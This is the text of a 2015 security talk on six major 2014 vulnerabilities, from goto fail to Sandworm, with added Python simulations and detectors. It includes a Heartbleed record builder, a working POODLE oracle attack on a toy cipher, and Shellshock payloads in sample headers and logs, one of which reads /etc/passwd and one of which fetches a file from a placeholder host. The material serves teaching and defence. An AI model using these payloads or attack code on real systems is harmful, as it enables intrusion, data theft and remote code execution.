2014 – Year of Broken
Name Generator(s)
Miroslav Štampar
(mstampar@zsis.hr)
FER 2015, Zagreb (Croatia) January 16th, 2015 2
Introduction(.jpg)
goto fail (1)
CVE-2014-1266 (6.8)
Discovered by @CrowdStrike by reverse engineering the security update for iOS (7.0.6)
Public disclosure on February 21, 2014
SSL/TLS vulnerability in iOS and OS X (Apple's Secure Transport library)
The signature over the ServerKeyExchange message is never actually verified
Allows MiTM attacks with fully transparent interception of HTTPS traffic
The bug had been shipping for more than a year (it was introduced with iOS 6)
Later, a similar bug (CVE-2014-0092) was found in GnuTLS
goto fail (2)
Attacker has to be in a position to intercept and change traffic between victim and target (MiTM)
Attacker sends fake (chosen) Diffie-Hellman parameters to the victim, along with the server's valid certificate, and forces an Ephemeral Diffie-Hellman (EDH/DHE) cipher suite (ECDHE is affected the same way), which triggers the vulnerable code path
The signature over the provided parameters is never properly checked against the server's certificate, so the forged parameters are accepted
This allows the attacker to generate the same session key(s) as the client (the purpose of Diffie-Hellman)
Once the "secure" connection is established between victim and attacker, the attacker plays the MiTM proxy role towards the real server
goto fail (3)
Vulnerable piece of code (SSLVerifySignedServerKeyExchange() in Apple's sslKeyExchange.c): a duplicated, unconditional goto fail; after one of the hash-update steps jumps to the cleanup label while err is still 0, so the function returns "success" without ever running the final signature check
goto fail (4)
$ mitmproxy --ciphers="DHE-RSA-AES256-SHA" --cert-forward
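The steps on the goto fail (2) slide, as an added example that is neither Apple's code nor the presenter's: a Python model of the DHE handshake in which verify_signed_params() mirrors the control flow of SSLVerifySignedServerKeyExchange() (the buggy path returns the still-zero err after the duplicated goto fail). The "signature" is an HMAC stand-in for the RSA signature over client_random||server_random||params, the DH group (p = 2^127-1, g = 2) is a toy one, and all key material is constructed; these are assumptions, not details from the slides.

```python
"""goto fail (CVE-2014-1266) modelled end to end: a DHE ServerKeyExchange whose
signature the client never checks lets a MiTM substitute its own DH parameters.
Added example, not code from the slides or from Apple (see assumptions below).
"""
import hashlib
import hmac
import random

P = 2**127 - 1        # toy DH modulus (assumption); real suites use >= 2048-bit groups
G = 2
SERVER_SIGNING_KEY = b"server-private-signing-key"   # what the server's certificate vouches for
SERVER_PUBLIC_KEY = SERVER_SIGNING_KEY                # HMAC stand-in for RSA: one key for both sides (assumption)


def sign(key, digest):
    """Stand-in for the RSA signature in ServerKeyExchange (assumption: HMAC-SHA256)."""
    return hmac.new(key, digest, hashlib.sha256).digest()


def encode_params(pub):
    """ServerDHParams: p, g, Ys (fixed-width here for simplicity)."""
    return P.to_bytes(16, "big") + G.to_bytes(1, "big") + pub.to_bytes(16, "big")


def verify_signed_params(pub_key, client_random, server_random, params, signature, buggy):
    """Returns 0 on success, non-zero on error (OSStatus style), like Secure Transport."""
    err = 0
    ctx = hashlib.sha1()
    ctx.update(client_random)          # SSLHashSHA1.update(&hashCtx, &clientRandom)
    ctx.update(server_random)          # SSLHashSHA1.update(&hashCtx, &serverRandom)
    if buggy:
        # The duplicated, unconditional "goto fail;": control jumps to the
        # cleanup label while err is still 0, i.e. "no error" -> signature accepted.
        return err
    ctx.update(params)                 # SSLHashSHA1.update(&hashCtx, &signedParams)
    digest = ctx.digest()              # SSLHashSHA1.final(&hashCtx, &hashOut)
    if not hmac.compare_digest(sign(pub_key, digest), signature):
        err = -9825                    # errSSLCrypto: the signature does not verify
    return err


def handshake(buggy_client, mitm, seed=1):
    """Returns (client_accepted, client_premaster, premaster_known_to_attacker)."""
    rng = random.Random(seed)
    client_random = rng.getrandbits(256).to_bytes(32, "big")
    server_random = rng.getrandbits(256).to_bytes(32, "big")

    # Genuine server: fresh DH secret, public value signed with the certificate key.
    server_secret = rng.getrandbits(120)
    params = encode_params(pow(G, server_secret, P))
    digest = hashlib.sha1(client_random + server_random + params).digest()
    signature = sign(SERVER_SIGNING_KEY, digest)

    attacker_secret = None
    if mitm:
        # The MiTM swaps in its own DH public value. It cannot sign it, so it
        # forwards the server's certificate and the (now mismatching) signature.
        attacker_secret = rng.getrandbits(120)
        params = encode_params(pow(G, attacker_secret, P))

    err = verify_signed_params(SERVER_PUBLIC_KEY, client_random, server_random,
                               params, signature, buggy_client)
    if err != 0:
        return False, None, None       # correct client: handshake aborted

    client_secret = rng.getrandbits(120)
    peer_pub = int.from_bytes(params[17:], "big")
    client_premaster = pow(peer_pub, client_secret, P)
    # Whoever holds the secret behind peer_pub derives the same premaster secret
    # from the client's public value g^client_secret that goes out in ClientKeyExchange.
    client_pub = pow(G, client_secret, P)
    attacker_premaster = pow(client_pub, attacker_secret, P) if mitm else None
    return True, client_premaster, attacker_premaster
```

With buggy_client=True and mitm=True the client "verifies" the forged parameters and ends up sharing its premaster secret with the attacker, which is exactly the position from which mitmproxy --cert-forward then relays the session; with buggy_client=False the same forged ServerKeyExchange is rejected.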
Heartbleed (1)
CVE-2014-0160 (5.0)
Discovered independently by Neel Mehta (@Google) and @Codenomicon at roughly the same time (while the bug had been there for years :)
Public disclosure on April 7, 2014
Buffer over-read in OpenSSL's (1.0.1 before 1.0.1g) implementation of the TLS heartbeat extension (RFC 6520)
Allows attackers to read up to 64 KB of the peer's process memory per request, including private cryptographic keys and private user data, without leaving a trace in logs
It is estimated that 24-55% of HTTPS servers in the Alexa Top 1 Million were initially vulnerable
Heartbleed (2)
The heartbeat extension provides a means to test and keep alive secure connections (mainly for DTLS, which has no TCP keep-alive)
A "Heartbeat Request" message is sent consisting of a payload (typically a text value), and the receiver has to send exactly the same payload back to the sender
The response is built from the length field in the request (up to 64 KB in case of attack) without checking it against the actual payload length (e.g. 6 bytes for "foobar"), which is known from the size of the enclosing TLS record
Heartbleed (3)
The response consists of the payload, followed by whatever else happened to be in the heap right after the record buffer (in case of a faked payload length)
The attack is repeated in the hope of reading a chunk previously used by OpenSSL (e.g. server private key, session cookies, credentials, etc.)
OpenSSL uses its own freelist allocator, so freed chunks are handed back in a predictable, non-randomised way and the over-read never trips a hardened system malloc, which makes exploitation far easier
Lots of criticism followed, especially against OpenSSL's "sloppy coding" style (e.g. LibreSSL developers removed roughly half of the OpenSSL source tree in a week)
Heartbleed (4)
Heartbleed (5)
$ python heartbleed.py www.target.com
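The request/handler logic from the Heartbleed (2)-(3) slides, as an added example (not the heartbleed.py the slide invokes): build the TLS heartbeat record with a lying payload_length, then run it through a handler that trusts that length (OpenSSL 1.0.1 to 1.0.1f) and one that applies the 1.0.1g bounds check. The "heap" is a constructed bytearray standing in for the data OpenSSL's freelist leaves next to the record buffer; that, the fake key fragment and the simplified record layout are assumptions.

```python
"""Heartbleed (CVE-2014-0160): the malicious heartbeat record and a simulation
of the vulnerable vs. fixed server-side handler. Added example, not the
slides' heartbleed.py; the 'heap' contents below are constructed."""
import struct

TLS_HEARTBEAT = 24            # TLS record content type for heartbeat messages
TLS1_1 = b"\x03\x02"
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16              # RFC 6520: at least 16 bytes of random padding


def heartbeat_record(payload, claimed_length=None, padding=bytes(MIN_PADDING)):
    """TLS record carrying a HeartbeatMessage; claimed_length may lie about len(payload)."""
    if claimed_length is None:
        claimed_length = len(payload)
    body = struct.pack("!BH", HB_REQUEST, claimed_length) + payload + padding
    return struct.pack("!B2sH", TLS_HEARTBEAT, TLS1_1, len(body)) + body


def parse_record(record):
    """Split a TLS record into (content_type, version, body)."""
    ctype, version, length = struct.unpack("!B2sH", record[:5])
    return ctype, version, record[5:5 + length]


def handle_heartbeat_vulnerable(memory, record_len):
    """OpenSSL 1.0.1-1.0.1f: trusts payload_length from the message itself and
    memcpy()s that many bytes from right after the 3-byte header, past the record."""
    hb_type, payload_length = struct.unpack_from("!BH", memory, 0)
    if hb_type != HB_REQUEST:
        return None
    data = bytes(memory[3:3 + payload_length])        # over-read beyond record_len
    return struct.pack("!BH", HB_RESPONSE, payload_length) + data + bytes(MIN_PADDING)


def handle_heartbeat_fixed(memory, record_len):
    """1.0.1g: silently discard when the claimed payload does not fit the record."""
    if record_len < 1 + 2 + MIN_PADDING:
        return None
    hb_type, payload_length = struct.unpack_from("!BH", memory, 0)
    if hb_type != HB_REQUEST or 1 + 2 + payload_length + MIN_PADDING > record_len:
        return None
    data = bytes(memory[3:3 + payload_length])
    return struct.pack("!BH", HB_RESPONSE, payload_length) + data + bytes(MIN_PADDING)


def leaked_bytes(response, real_payload):
    """Everything in the response payload beyond the echoed bytes is leaked memory."""
    _, payload_length = struct.unpack_from("!BH", response, 0)
    return response[3:3 + payload_length][len(real_payload):]


def demo(claimed_length=0x4000):
    """Returns (bytes leaked by the vulnerable handler, result of the fixed handler)."""
    # Constructed heap: the record buffer is followed by stale data from earlier
    # requests, standing in for what OpenSSL's freelist hands back (assumption).
    stale = (b"GET /account HTTP/1.1\r\nCookie: session=9a1f77c0\r\n\r\n"
             b"-----BEGIN RSA PRIVATE KEY-----\nMIIEow(fake key material)\n")
    record = heartbeat_record(b"foobar", claimed_length)   # says 16 KB, carries 6 bytes
    _, _, body = parse_record(record)
    memory = bytearray(body) + stale + bytes(0x4000)       # zero-filled heap beyond
    vuln = handle_heartbeat_vulnerable(memory, len(body))
    fixed = handle_heartbeat_fixed(memory, len(body))
    return leaked_bytes(vuln, b"foobar"), fixed
```

The real heartbleed.py sends a ClientHello first because vulnerable OpenSSL versions processed heartbeat records even before the handshake completed, so no valid session (and no encryption) is needed to trigger the over-read.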
Rosetta Flash (1)
CVE-2014-4671 (6.8) and CVE-2014-5333 (6.8)
Discovered by Michele Spagnuolo (@Google)
Public disclosure on July 8, 2014
JSONP (JSON with padding) is a communication technique used by JavaScript programs to request data from a server in a different domain
Basically, it is a script-tag injection method: the server wraps its response in a call to a user-specified "callback" function, and that function runs in the requesting page's (different-domain) context
A website with a JSONP endpoint that accepts only alphanumeric callback names (for security reasons) can still be abused (against the client's Adobe Flash Player) with specially crafted, entirely alphanumeric SWF files, because the callback name is reflected at the very start of the response body
Rosetta Flash (2)
The endpoint can be made to serve (echo back, as the "callback" name) a malicious alphanumeric SWF that Flash Player then loads as if it were hosted by the vulnerable domain
The SWF (Flash) file is executed in the context of the target domain, so it can make authenticated requests (the browser attaches the cookies) and read the responses: a CSRF attack that also leaks the content of same-domain URLs to the attacker's site
"Patching" was required both on the client side (Adobe Flash Player 14.0.0.176, which refuses such SWFs) and on the server side (prefixing JSONP responses with /**/ so they can never start with a SWF header, plus Content-Disposition: attachment and X-Content-Type-Options: nosniff) for successful mitigation
Many high-profile sites were affected (Google, YouTube, Twitter, LinkedIn, Yahoo, eBay, Flickr, Baidu, Instagram, Tumblr, etc.)
Rosetta Flash (3)
Vulnerable JSONP sample application:
Sample malicious alphanumeric SWF:
Rosetta Flash (4)
Sample malicious web page:
Rosetta Flash (5)
$ msfconsole (flash_rosetta_jsonp_url_disclosure)
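The endpoint from the "vulnerable JSONP sample application" slide next to its hardened counterpart, as an added example (not the slide's application nor the Metasploit module). It applies the server-side mitigations published with the Rosetta Flash disclosure (leading /**/, Content-Disposition: attachment, X-Content-Type-Options: nosniff). The callback string in the test is a placeholder that merely begins with the CWS magic, not a working SWF, and no Flash Player is involved; the handlers are plain functions rather than a web framework (assumptions).

```python
"""JSONP endpoint: the reflected callback name is the attack surface of Rosetta
Flash. Added example, not the slides' sample application."""
import json
import re

CALLBACK_RE = re.compile(r"^[A-Za-z0-9_]+$")   # "alphanumeric only", as on the slide
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")          # uncompressed, zlib- and LZMA-compressed SWF


def jsonp_vulnerable(callback, data):
    """Alphanumeric-only callback, yet the body may begin with a SWF header:
    the filter stops script injection, not a body that *is* a SWF."""
    if not CALLBACK_RE.match(callback):
        return 400, {}, b"bad callback"
    body = ("%s(%s);" % (callback, json.dumps(data))).encode()
    return 200, {"Content-Type": "application/javascript"}, body


def jsonp_hardened(callback, data):
    """Server-side mitigations: a leading comment so the response can never start
    with FWS/CWS/ZWS, plus headers that keep Flash/browsers from treating the
    response as anything other than a downloaded script."""
    if not CALLBACK_RE.match(callback):
        return 400, {}, b"bad callback"
    body = ("/**/%s(%s);" % (callback, json.dumps(data))).encode()
    headers = {
        "Content-Type": "application/javascript",
        "Content-Disposition": "attachment; filename=f.txt",
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, body


def looks_like_swf(body):
    """Check a response body the way Flash Player would: does it start with a SWF magic?"""
    return body[:3] in SWF_MAGIC


def endpoint_is_exposed(handler, probe="CWS0hCD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn"):
    """Black-box check for an endpoint: reflect a CWS-prefixed callback (placeholder,
    assumption: a real Rosetta payload is a full alphanumeric SWF) and see whether
    the body starts with it. A hit means the endpoint needs the /**/ prefix."""
    status, _, body = handler(probe, {"ok": True})
    return status == 200 and looks_like_swf(body)
```

Rejecting callbacks that start with FWS/CWS/ZWS is not a substitute for the prefix: the SWF header was only one of the tricks, and the /**/ prefix breaks every variant at once.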
Shellshock (1)
CVE-2014-6271 (10.0), CVE-2014-6277 (10.0), CVE-2014-6278 (10.0), CVE-2014-7169 (10.0), CVE-2014-7186 (10.0) and CVE-2014-7187 (10.0)
Discovered by Stéphane Chazelas
Public disclosure on September 24, 2014
Remote code execution through Bash
Many Linux, *BSD and other Unix-like Internet-facing systems expose Bash to attacker-controlled input (e.g. HTTP (CGI), DHCP client hook scripts, SSH ForceCommand, CUPS, etc.)
Bash supports exporting not just shell variables, but also shell functions (as environment variables) to child bash instances
Shellshock (2)
Sample function definition in Bash (an exported function reaches child processes as an environment variable whose value starts with "() {"):
Commands appended after the closing brace of such a function definition are unintentionally executed (on the vulnerable machine) when Bash imports the environment variable at startup:
Shellshock (3)
HTTP requests to CGI scripts have been identified as the major attack vector
The CGI specification (RFC 3875) maps request metadata to environment variables (e.g. the User-Agent header becomes $HTTP_USER_AGENT and the query string $QUERY_STRING), so every header value arrives as attacker-controlled environment content
CGI programs written in Perl, PHP, Python, Ruby and Bash itself are potentially vulnerable: any of them that spawns a shell (system(), popen(), backticks) on a system where that shell is Bash hands it the poisoned environment
Sample vulnerable script:
Shellshock (4)
Sample attack:
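An added example for the Shellshock (2)-(4) slides, not code from the presentation: the CGI meta-variable mapping that carries a header into Bash's environment, a detector for the "() {" function-export prefix in requests and access-log lines, and the standard local check for a vulnerable bash. The request, the log lines and the header values are constructed, and the mapping covers only the RFC 3875 variables relevant here (assumptions).

```python
"""Shellshock (CVE-2014-6271 family): CGI header-to-environment mapping,
payload detection, and the canonical local bash check. Added example; the
request and log lines below are constructed."""
import re
import subprocess

# Prefix that bash 4.3 and earlier parsed as a function export in any env value.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def cgi_environment(method, path, query, headers):
    """Meta-variables a CGI gateway exports before exec()ing the script (RFC 3875).
    Every HTTP_* value is attacker-controlled; that is what reaches bash."""
    env = {
        "GATEWAY_INTERFACE": "CGI/1.1",
        "REQUEST_METHOD": method,
        "SCRIPT_NAME": path,
        "QUERY_STRING": query,
        "SERVER_PROTOCOL": "HTTP/1.1",
    }
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def find_shellshock(env):
    """Variables whose values a vulnerable bash would parse as function definitions."""
    return {k: v for k, v in env.items() if SHELLSHOCK_RE.search(v)}


def scan_access_log(lines):
    """Flag log lines carrying the payload in any field (User-Agent, Referer, URI)."""
    return [line for line in lines if SHELLSHOCK_RE.search(line)]


def bash_is_vulnerable(bash="bash"):
    """The canonical test: a patched bash prints only 'this is a test'.
    Returns None when no bash binary can be run."""
    env = {"x": "() { :;}; echo vulnerable"}
    try:
        out = subprocess.run([bash, "-c", "echo this is a test"], env=env,
                             capture_output=True, text=True, timeout=10).stdout
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in out


# Constructed request as a CGI gateway sees it (payload in User-Agent).
ATTACK_HEADERS = {
    "Host": "www.example.com",
    "User-Agent": "() { :;}; /bin/bash -c 'cat /etc/passwd'",
    "Accept": "*/*",
}

# Constructed access-log lines (combined log format): two attacks, one benign hit.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/bash -c \'cat /etc/passwd\'"',
    '198.51.100.8 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [25/Sep/2014:10:02:00 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "() { :;}; /usr/bin/wget http://198.51.100.9/x -O /tmp/x" "-"',
]
```

The regex deliberately matches the prefix only: the later bypasses (e.g. CVE-2014-7169's "() { (a)=>\" form) still start with "() {", so the same check catches them in logs, while the local bash test above only exercises the original CVE-2014-6271 parser bug.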
POODLE (1)
CVE-2014-3566 (4.3)
Discovered by Bodo Möller, Thai Duong and Krzysztof Kotowicz (@Google)
Public disclosure on October 14, 2014
"Padding Oracle On Downgraded Legacy Encryption"
Padding oracle attack against the CBC mode of operation in SSL 3.0 (using the same attacker model as the BEAST attack: MiTM plus attacker-controlled requests issued by the victim's browser, but exploiting a different flaw)
In case of TLS usage, the MiTM first forces a version downgrade from TLS to SSL 3.0 by making the TLS handshakes fail
Major browsers voluntarily downgraded to SSL 3.0 if TLS handshakes failed (the "downgrade dance"), which is what made the attack practical; TLS_FALLBACK_SCSV was introduced so servers can detect such fallbacks
POODLE (2)
SSL 3.0 (from 1996, superseded by TLS 1.0 15 years ago) uses non-deterministic CBC padding, which makes padding oracle attacks possible in a MiTM environment
Padding is performed to make the length of plaintext plus MAC equal to a multiple of the cipher's block size (e.g. 8 bytes in case of 3DES and 16 bytes in case of AES)
SSL 3.0 padding ends with a single byte giving the length of the padding; the padding bytes themselves are unspecified and are not checked by the receiver (TLS 1.0 and later require every padding byte to equal the length byte)
In a padding oracle attack the server leaks whether the padding of an encrypted message was correct or not; in POODLE the observable is whether the record is rejected (bad_record_mac alert, connection closed) after the padding has been stripped and the MAC checked
POODLE (3)
CBC mode decryption: each plaintext block is the block-cipher decryption of its ciphertext block XORed with the previous ciphertext block (the IV for the first block), so the last byte of a plaintext block depends on exactly two things the attacker can see, the ciphertext block itself and the last byte of the block before it
POODLE (4)
The POODLE attack presumes that the victim runs malicious JavaScript in a browser which makes the browser issue attacker-controlled requests (with cookies) to the origin of interest (e.g. google.com); the attacker chooses the request's path and body lengths so that one cookie byte lands at the end of a block and a full block of padding gets appended
Attacker intercepts one such encrypted request, takes the block which contains the value of interest (e.g. one "shifted" cookie byte at the block's last position) and copies it over the last (padding-only) block before forwarding the request to the server
If the server doesn't reject such a "skewed" request, the decryption of the copied block XORed with the last byte of the ciphertext block preceding the padding block must have ended in the known padding-length byte (block size minus one, i.e. 15 for AES); XORing that value with the last byte of the ciphertext block that originally preceded the copied block yields the plaintext cookie byte
Each attempt has a 1 in 256 chance of being accepted, so on average 256 requests reveal one byte; the JavaScript then shifts the request by one byte and the process repeats for the next cookie byte
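The POODLE (2)-(4) slides carried through in code, as an added example that is not the presenter's or Google's: an SSL 3.0-style record layer (MAC, then padding whose only checked byte is the last one, then CBC), the server's accept/reject decision as the oracle, and the attacker loop that copies the block holding one cookie byte over the padding block and reads the byte out of the first accepted request. Assumptions: the block cipher is a 4-round Feistel toy keyed with SHA-256 rather than AES, the MAC is HMAC-SHA1 rather than SSL 3.0's MAC, each record gets a fresh IV from a seeded RNG (SSL 3.0 chains IVs; a fresh IV only makes the attempts independent), and the cookie value sid=7f3a and the session keys are constructed.

```python
"""POODLE (CVE-2014-3566) end to end on a simulated SSL 3.0 record layer.
Added example; the cipher, MAC and keys are stand-ins (see lead-in)."""
import hashlib
import hmac
import random

BLOCK = 16
MAC_LEN = 20


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    # Round function of the toy Feistel block cipher (assumption: not a real cipher).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def _enc_block(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def _dec_block(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def cbc_encrypt(key, iv, plain):
    out, prev = [], iv
    for i in range(0, len(plain), BLOCK):
        prev = _enc_block(key, _xor(plain[i:i + BLOCK], prev))   # C_i = E(P_i xor C_{i-1})
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(_dec_block(key, ct[i:i + BLOCK]), prev))   # P_i = D(C_i) xor C_{i-1}
        prev = ct[i:i + BLOCK]
    return b"".join(out)


class Ssl3Endpoint:
    """Shared-key record layer: seal() is what the victim's browser does,
    accepts() is the server's padding-then-MAC check, i.e. the oracle."""

    def __init__(self, key, mac_key):
        self.key, self.mac_key = key, mac_key

    def _mac(self, data):
        return hmac.new(self.mac_key, data, hashlib.sha1).digest()

    def seal(self, data, iv):
        body = data + self._mac(data)
        pad_len = BLOCK - len(body) % BLOCK - 1     # SSL 3.0: only the last byte matters
        return iv + cbc_encrypt(self.key, iv, body + bytes(pad_len) + bytes([pad_len]))

    def accepts(self, record):
        plain = cbc_decrypt(self.key, record[:BLOCK], record[BLOCK:])
        pad_len = plain[-1]
        if pad_len >= BLOCK:                        # the only padding check SSL 3.0 makes
            return False
        body = plain[:len(plain) - pad_len - 1]
        data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
        return hmac.compare_digest(mac, self._mac(data))


def poodle(secret, seed=1, max_tries=50000):
    """Recover `secret` (the cookie the browser appends) through the oracle."""
    rng = random.Random(seed)
    session = Ssl3Endpoint(b"session-enc-key", b"session-mac-key")

    def browser_request(prefix_len, suffix_len):
        # Attacker's JavaScript controls path length (prefix) and body length (suffix);
        # the browser inserts the cookie between them and encrypts under the session keys.
        iv = bytes(rng.getrandbits(8) for _ in range(BLOCK))
        return session.seal(b"A" * prefix_len + secret + b"B" * suffix_len, iv)

    recovered = bytearray()
    for j in range(len(secret)):
        p = BLOCK + (BLOCK - 1 - j) % BLOCK            # byte j becomes the last byte of a block
        s = -(p + len(secret) + MAC_LEN) % BLOCK       # makes the padding a full block
        k = (p + j) // BLOCK                           # plaintext block holding byte j
        for _ in range(max_tries):
            rec = browser_request(p, s)
            n = len(rec) // BLOCK - 1                  # index of the padding block (IV is block 0)
            forged = rec[:n * BLOCK] + rec[(k + 1) * BLOCK:(k + 2) * BLOCK]
            if session.accepts(forged):
                # D(C_{k+1})[-1] xor C_{n-1}[-1] == BLOCK-1, hence
                # P_k[-1] = (BLOCK-1) xor C_{n-1}[-1] xor C_k[-1]
                recovered.append((BLOCK - 1) ^ rec[n * BLOCK - 1] ^ rec[(k + 1) * BLOCK - 1])
                break
        else:
            raise RuntimeError("oracle never accepted a forged record")
    return bytes(recovered)
```

Run poodle(b"sid=7f3a") and the full cookie comes back after roughly 256 oracle queries per byte; swapping accepts() for a TLS 1.0-style check that verifies every padding byte makes the forged record fail unless all 16 bytes decrypt to 15, which is why the attack is specific to SSL 3.0.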
Sandworm (1)
CVE-2014-4114 (9.3)
Identified by @iSIGHT in the same-named "Sandworm" cyber-espionage campaign
Public disclosure on October 15, 2014 (fixed by MS14-060)
Microsoft Windows OLE arbitrary code execution
Windows Vista SP2, Windows 7/8/8.1, Windows RT and Windows Server 2008/2012 are known to be vulnerable
The problem lies in how the Object Packager 2 component (packager.dll) handles an INF file that contains malicious registry changes (e.g. a RunOnce entry pointing to a dropped executable)
An INF can't be loaded (and executed) directly from a document, but that can be forced by embedding the file's path on a remote share as an OLE object (e.g. in a PowerPoint file); opening the document fetches and installs the INF without any exploit shellcode
Sandworm (2)
$ msfconsole (ms14_060_sandworm)
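An added triage check for the Sandworm (1)-(2) slides, not the presenter's or Metasploit's code: Office Open XML files are zip containers, and the exploit documents reference the attacker's INF through an OLE-object relationship whose Target is an external UNC path, so the relationship parts can be scanned without opening the file in Office. The sample .ppsx built in memory is constructed (a real deck has many more parts) and the UNC path 192.0.2.10 is a placeholder; both are assumptions.

```python
"""Sandworm (CVE-2014-4114) document triage: find OLE relationships that point
at an external UNC share. Added example; the sample container is constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# file:\\host\share\..., file:///\\host\share\... or a bare \\host\share\... path
UNC_RE = re.compile(r"^(file:/{0,3})?\\\\[^\\]+\\", re.IGNORECASE)


def external_ole_targets(ooxml_bytes):
    """Return [(part, target)] for every OLE relationship whose target is an
    external UNC path; a benign deck embeds its objects inside the zip instead."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and UNC_RE.match(target):
                    hits.append((name, target))
    return hits


def build_sample(target, external=True):
    """Constructed minimal .ppsx-like container (assumption) with one slide whose
    OLE object relationship points at `target`."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId2" Type="%s" Target="%s"%s/>'
        '</Relationships>' % (RELS_NS, OLE_REL_TYPE, target, mode)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()
```

A hit on its own is an indicator, not proof: a document that legitimately links an object on a file server looks the same, so the next step is to fetch or block the share and look at what the INF installs (the RunOnce entry from the Sandworm (1) slide).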
Sandworm (3)
Questions?